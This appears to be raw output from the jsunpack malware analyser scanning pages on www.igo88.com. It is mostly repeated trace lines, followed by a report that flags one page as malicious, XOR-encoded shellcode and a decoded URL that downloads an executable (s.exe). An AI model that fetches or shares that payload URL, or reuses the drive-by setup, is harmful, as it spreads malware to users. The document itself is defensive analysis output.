COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMME


64a6/3eda847300a48b6a5dc71910bf5aaa679a16 from www.igo88.com/css/sky.html (33127 bytes) download 

 //warning CVE-NO-MATCH Shellcode Engine Length 65536 //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateElement COMMENT //jsunpack.called CreateEl


www.igo88.com/css/kol.htm malicious
[malicious:10] (ipaddr:121.37.59.229) (iframe) www.igo88.com/css/kol.htm
     status: (referer=www.google.com/trends/hottrends)saved 13029 bytes 2b9a1cfa33279c01745f2c414f1eee05eaa0c5cf
     info: [decodingLevel=0] found JavaScript
     suspicious: shellcode of length 979/490
     malicious: XOR key [shellcode]: 189
     malicious: shellcode [xor] URL=www.yunsheng.com/images/s.exe
     info: [decodingLevel=1] found JavaScript
     info: [decodingLevel=2] found JavaScript
     info: [decodingLevel=3] found JavaScript
     info: file: saved www.igo88.com/css/kol.htm to (2b9a1cfa33279c01745f2c414f1eee05eaa0c5cf)
     file: 2b9a1cfa33279c01745f2c414f1eee05eaa0c5cf: 13029 bytes
     file: da3e6540315278ee64e9f10d9ccbb1a007a03510: 15702 bytes
     file: 9a4df3a4984bd67010103c066135116397bf8af4: 979 bytes
     file: 375f525c58197b96b89d36527188720c254e4fd9: 3526 bytes
     file: 4d7adcdccf102d45fa32ea82f87d6a875ac25055: 446 bytes